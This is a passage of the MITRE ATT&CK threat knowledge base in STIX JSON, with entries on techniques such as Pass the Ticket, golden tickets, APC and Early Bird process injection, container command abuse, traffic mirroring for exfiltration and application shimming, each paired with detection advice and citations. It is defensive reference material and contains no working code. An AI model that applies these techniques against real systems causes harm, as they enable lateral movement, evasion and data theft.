resources\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.\n\nUser access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["SaaS"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc", "created": "2020-02-14T13:09:51.004Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1213/001", "external_id": "T1213.001"}, {"source_name": "Atlassian Confluence Logging", "description": "Atlassian. (2018, January 9). How to Enable User Access Logging. Retrieved April 4, 2018.", "url": "https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-31T14:00:00.188Z", "name": "Pass the Ticket", "description": "Adversaries may \u201cpass the ticket\u201d using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.\n\nWhen preforming PtT, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket)\n\nA [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks)\n\nA [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014)\n\nAdversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, \"overpassing the hash\" involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Vincent Le Toux", "Ryan Becwar"], "x_mitre_detection": "Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.\n\nEvent ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to \"Integrity check on decrypted field failed\" and indicates misuse by a previously invalidated golden ticket.(Citation: CERT-EU Golden Ticket Protection)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["System Access Controls"], "x_mitre_system_requirements": ["Kerberos authentication enabled"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926", "created": "2020-01-30T17:03:43.072Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1550/003", "external_id": "T1550.003"}, {"source_name": "ADSecurity AD Kerberos Attacks", "description": "Metcalf, S. (2014, November 22). Mimikatz and Active Directory Kerberos Attacks. Retrieved June 2, 2016.", "url": "https://adsecurity.org/?p=556"}, {"source_name": "GentilKiwi Pass the Ticket", "description": "Deply, B. (2014, January 13). Pass the ticket. Retrieved June 2, 2016.", "url": "http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos"}, {"source_name": "Campbell 2014", "description": "Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December 4, 2014.", "url": "http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf"}, {"source_name": "Stealthbits Overpass-the-Hash", "description": "Warren, J. (2019, February 26). How to Detect Overpass-the-Hash Attacks. Retrieved February 4, 2021.", "url": "https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/"}, {"source_name": "CERT-EU Golden Ticket Protection", "description": "Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.", "url": "https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Container Administration Command", "description": "Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)\n\nIn Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as docker exec to execute a command within a running container.(Citation: Docker Entrypoint)(Citation: Docker Exec) In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as kubectl exec.(Citation: Kubectl Exec Get Shell)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Alfredo Oliveira, Trend Micro", "David Fiser, @anu4is, Trend Micro", "Brad Geesaman, @bradgeesaman", "Center for Threat-Informed Defense (CTID)", "Magno Logan, @magnologan, Trend Micro", "Vishwas Manral, McAfee", "Yossi Weizman, Azure Defender Research Team"], "x_mitre_deprecated": false, "x_mitre_detection": "Container administration service activities and executed commands can be captured through logging of process execution with command-line arguments on the container and the underlying host. In Docker, the daemon log provides insight into events at the daemon and container service level. Kubernetes system component logs may also detect activities running in and out of containers in the cluster. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Containers"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_remote_support": true, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--7b50a1d3-4ca7-45d1-989d-a6503f04bfe1", "created": "2021-03-29T16:39:26.183Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1609", "external_id": "T1609"}, {"source_name": "Docker Exec", "description": "Docker. (n.d.). Docker Exec. Retrieved March 29, 2021.", "url": "https://docs.docker.com/engine/reference/commandline/exec/"}, {"source_name": "Docker Entrypoint", "description": "Docker. (n.d.). Docker run reference. Retrieved March 29, 2021.", "url": "https://docs.docker.com/engine/reference/run/#entrypoint-default-command-to-execute-at-runtime"}, {"source_name": "Docker Daemon CLI", "description": "Docker. (n.d.). DockerD CLI. Retrieved March 29, 2021.", "url": "https://docs.docker.com/engine/reference/commandline/dockerd/"}, {"source_name": "Kubectl Exec Get Shell", "description": "The Kubernetes Authors. (n.d.). Get a Shell to a Running Container. Retrieved March 29, 2021.", "url": "https://kubernetes.io/docs/tasks/debug-application-cluster/get-shell-running-container/"}, {"source_name": "Kubernetes Kubelet", "description": "The Kubernetes Authors. (n.d.). Kubelet. Retrieved March 29, 2021.", "url": "https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/"}, {"source_name": "Kubernetes API", "description": "The Kubernetes Authors. (n.d.). The Kubernetes API. Retrieved March 29, 2021.", "url": "https://kubernetes.io/docs/concepts/overview/kubernetes-api/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-16T12:40:10.978Z", "name": "File and Directory Discovery", "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nMany command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather file and directory information (e.g. dir, show flash, and/or nvram).(Citation: US-CERT-TA18-106A)\n\nSome files and directories may require elevated or specific user permissions to access.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Austin Clark, @c2defense"], "x_mitre_deprecated": false, "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to gather file and directory information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use of commands being run by non-standard users from non-standard locations. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "1.6", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", "created": "2017-05-31T21:31:04.710Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1083", "external_id": "T1083"}, {"source_name": "Windows Commands JPCERT", "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html"}, {"source_name": "US-CERT-TA18-106A", "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Dynamic Resolution", "description": "Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.\n\nAdversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Chris Roffe"], "x_mitre_detection": "Detecting dynamically generated C2 can be challenging due to the number of different algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There are multiple approaches to detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more (Citation: Data Driven Security DGA). CDN domains may trigger these detections due to the format of their domain names. In addition to detecting algorithm generated domains based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b", "created": "2020-03-10T17:28:11.747Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1568", "external_id": "T1568"}, {"source_name": "Talos CCleanup 2017", "description": "Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast Number of Machines at Risk. Retrieved March 9, 2018.", "url": "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html"}, {"source_name": "FireEye POSHSPY April 2017", "description": "Dunwoody, M.. (2017, April 3). Dissecting One of APT29\u2019s Fileless WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.", "url": "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html"}, {"source_name": "ESET Sednit 2017 Activity", "description": "ESET. (2017, December 21). Sednit update: How Fancy Bear Spent the Year. Retrieved February 18, 2019.", "url": "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/"}, {"source_name": "Data Driven Security DGA", "description": "Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019.", "url": "https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-09-29T20:30:58.300Z", "name": "Masquerade Task or Service", "description": "Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.\n\nTasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Look for changes to tasks and services that do not correlate with known software, patch cycles, etc. Suspicious program execution through scheduled tasks or services may show up as outlier processes that have not been seen before when compared against historical data. Monitor processes and command-line arguments for actions that could be taken to create tasks or services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux", "macOS"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", "created": "2020-02-10T20:30:07.426Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1036/004", "external_id": "T1036.004"}, {"source_name": "Fysbis Dr Web Analysis", "description": "Doctor Web. (2014, November 21). Linux.BackDoor.Fysbis.1. Retrieved December 7, 2017.", "url": "https://vms.drweb.com/virus/?i=4276269"}, {"source_name": "Palo Alto Shamoon Nov 2016", "description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.", "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/"}, {"source_name": "Systemd Service Units", "description": "Freedesktop.org. (n.d.). systemd.service \u2014 Service unit configuration. Retrieved March 16, 2020.", "url": "https://www.freedesktop.org/software/systemd/man/systemd.service.html"}, {"source_name": "TechNet Schtasks", "description": "Microsoft. (n.d.). Schtasks. Retrieved April 28, 2016.", "url": "https://technet.microsoft.com/en-us/library/bb490996.aspx"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Asynchronous Procedure Call", "description": "Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process. \n\nAPC injection is commonly performed by attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state.(Citation: Microsoft APC) A handle to an existing victim process is first created with native Windows API calls such as OpenThread. At this point QueueUserAPC can be used to invoke a function (such as LoadLibrayA pointing to a malicious DLL). \n\nA variation of APC injection, dubbed \"Early Bird injection\", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.(Citation: Microsoft Atom Table)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Application control", "Anti-virus"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--7c0f17c9-1af6-4628-9cbd-9e45482dd605", "created": "2020-01-14T01:29:43.786Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1055/004", "external_id": "T1055.004"}, {"source_name": "Microsoft APC", "description": "Microsoft. (n.d.). Asynchronous Procedure Calls. Retrieved December 8, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/ms681951.aspx"}, {"source_name": "CyberBit Early Bird Apr 2018", "description": "Gavriel, H. & Erbesfeld, B. (2018, April 11). New \u2018Early Bird\u2019 Code Injection Technique Discovered. Retrieved May 24, 2018.", "url": "https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/"}, {"source_name": "ENSIL AtomBombing Oct 2016", "description": "Liberman, T. (2016, October 27). ATOMBOMBING: BRAND NEW CODE INJECTION FOR WINDOWS. Retrieved December 8, 2017.", "url": "https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows"}, {"source_name": "Microsoft Atom Table", "description": "Microsoft. (n.d.). About Atom Tables. Retrieved December 8, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/ms649053.aspx"}, {"source_name": "Elastic Process Injection July 2017", "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-04-14T23:23:30.327Z", "name": "Traffic Duplication", "description": "Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)\n\nAdversaries may abuse traffic mirroring to mirror or redirect network traffic through other infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks)\n\nMany cloud-based environments also support traffic mirroring. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP)\n\nAdversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "exfiltration"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor network traffic for uncommon data flows (e.g. unusual network communications, suspicious communications that have never been seen before, communications sending fixed size data packets at regular intervals). Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Network", "IaaS"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_network_requirements": false, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1", "created": "2020-10-19T13:40:11.118Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1020/001", "external_id": "T1020.001"}, {"source_name": "AWS Traffic Mirroring", "description": "Amazon Web Services. (n.d.). How Traffic Mirroring works. Retrieved March 17, 2022.", "url": "https://docs.aws.amazon.com/vpc/latest/mirroring/traffic-mirroring-how-it-works.html"}, {"source_name": "Cisco Traffic Mirroring", "description": "Cisco. (n.d.). Cisco IOS XR Interface and Hardware Component Configuration Guide for the Cisco CRS Router, Release 5.1.x. Retrieved October 19, 2020.", "url": "https://www.cisco.com/c/en/us/td/docs/routers/crs/software/crs_r5-1/interfaces/configuration/guide/hc51xcrsbook/hc51span.html"}, {"source_name": "GCP Packet Mirroring", "description": "Google Cloud. (n.d.). Packet Mirroring overview. Retrieved March 17, 2022.", "url": "https://cloud.google.com/vpc/docs/packet-mirroring"}, {"source_name": "Juniper Traffic Mirroring", "description": "Juniper. (n.d.). Understanding Port Mirroring on EX2200, EX3200, EX3300, EX4200, EX4500, EX4550, EX6200, and EX8200 Series Switches. Retrieved October 19, 2020.", "url": "https://www.juniper.net/documentation/en_US/junos/topics/concept/port-mirroring-ex-series.html"}, {"source_name": "Azure Virtual Network TAP", "description": "Microsoft. (2022, February 9). Virtual network TAP. Retrieved March 17, 2022.", "url": "https://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-tap-overview"}, {"source_name": "Cisco Blog Legacy Device Attacks", "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"}, {"source_name": "US-CERT-TA18-106A", "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Application Shimming", "description": "The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Elastic Process Injection July 2017) Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses [Hooking](https://attack.mitre.org/techniques/T1179) to redirect the code as necessary in order to communicate with the OS. \n\nA list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) (UAC) (RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). Similar to [Hooking](https://attack.mitre.org/techniques/T1179), utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim):\n\n* Shim-Process-Scanner - checks memory of every running process for any Shim flags\n* Shim-Detector-Lite - detects installation of custom shim databases\n* Shim-Guard - monitors registry for any shim installations\n* ShimScanner - forensic tool to find active shims in memory\n* ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)\n\nMonitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--7c93aa74-4bc0-4a9e-90ea-f25f86301566", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1138", "external_id": "T1138"}, {"source_name": "Elastic Process Injection July 2017", "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"}, {"source_name": "Black Hat 2015 App Shim", "description": "Pierce, Sean. (2015, November). Defending Against Malicious Application Compatibility Shims. Retrieved June 22, 2017.", "url": "https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Plist File Modification", "description": "Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist files, such as the info.plist file, to store properties and configuration settings that inform the operating system how to handle the application at runtime. Plist files are structured metadata in key-value pairs formatted in XML based on Apple's Core Foundation DTD. Plist files can be saved in text or binary format.(Citation: fileinfo plist file description) \n\nAdversaries can modify 